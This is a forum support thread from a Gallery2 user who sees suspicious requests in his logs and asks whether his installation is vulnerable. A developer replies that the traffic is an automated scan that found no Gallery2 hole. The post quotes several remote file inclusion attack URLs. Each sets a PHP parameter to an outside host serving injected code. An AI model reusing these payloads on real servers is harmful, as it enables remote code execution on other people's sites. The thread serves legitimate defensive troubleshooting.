Exploit? PHP File injection? Suspicious URls to my gallery2.3.1 Update: Gallery2 secure!

Asspalmer

Joined: 2005-10-12
Posts: 3
Posted: Thu, 2010-01-28 22:13

I keep seeing people hit my installation with URLs like this.

http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html%20%20/index.php&g=http://188.165.37.25/Nea/ftp/FxID1.txt??
http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html//errors.php&error=http://www.anabolex.com/gallery/uploads/16570/hosting/a??
http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html/index.php&g=http://188.165.37.25/Nea/ftp/FxID1.txt??
http://mysite.c0m/gallery/main.php?g2_path=/index.php//index.php&mosConfig_absolute_path=http://www.focusi.net/bbs/data/board_free/satu.txt??
http://mysite.c0m/gallery/main.php?g2_path=index_php.jpg.html%20%20////&_SERVER[DOCUMENT_ROOT]=http://julie.pwo.ca/idxx.txt???
(dont click this isnt my actual site)

They show up in my Gallery2 log with the error "Error (ERROR_MISSING_OBJECT)"

I look at these sites its appending on the URL and its a text file with some php in it, seems like some kind of PHP injection attack. Is my site vulnerable? I was running 2.3 and the site was broken, tho it wokred the other day, so I updated to 2.3.1 and now I am back up but am just wondering if this is a known exploit or if its old and fixed in 2.3.1.

edit: OH! I only discovered this because Google sent me an email saying my site was compromised, however the "malware" links they provided and claimed I was hosting did not exist on my server so I am kind of confused why I got that.

Login or register to post comments
bharat
bharat's picture

Joined: 2002-05-21
Posts: 6329
Posted: Fri, 2010-01-29 01:11

It looks to me like a fishing attempt to try to find a vulnerability. We're always interested in possible security vulnerabilities, though so if you can email the details to

we'll be happy to investigate and see if we can figure out what's going on.
---
Problems? Check gallery3/var/logs
bugs/feature req's | upgrade to the latest code | use git

Login or register to post comments
Asspalmer

Joined: 2005-10-12
Posts: 3
Posted: Fri, 2010-01-29 02:09

OK will do. My site is getting hammered with those types of requests literally every minute or so, so something is going on.

Login or register to post comments
bharat
bharat's picture

Joined: 2002-05-21
Posts: 6329
Posted: Fri, 2010-01-29 17:44

Followup: We talked offline and looked at the traffic and believe that this is a automated attack that is not turning up a vulnerability in Gallery2.
---
Problems? Check gallery3/var/logs
bugs/feature req's | upgrade to the latest code | use git

Login or register to post comments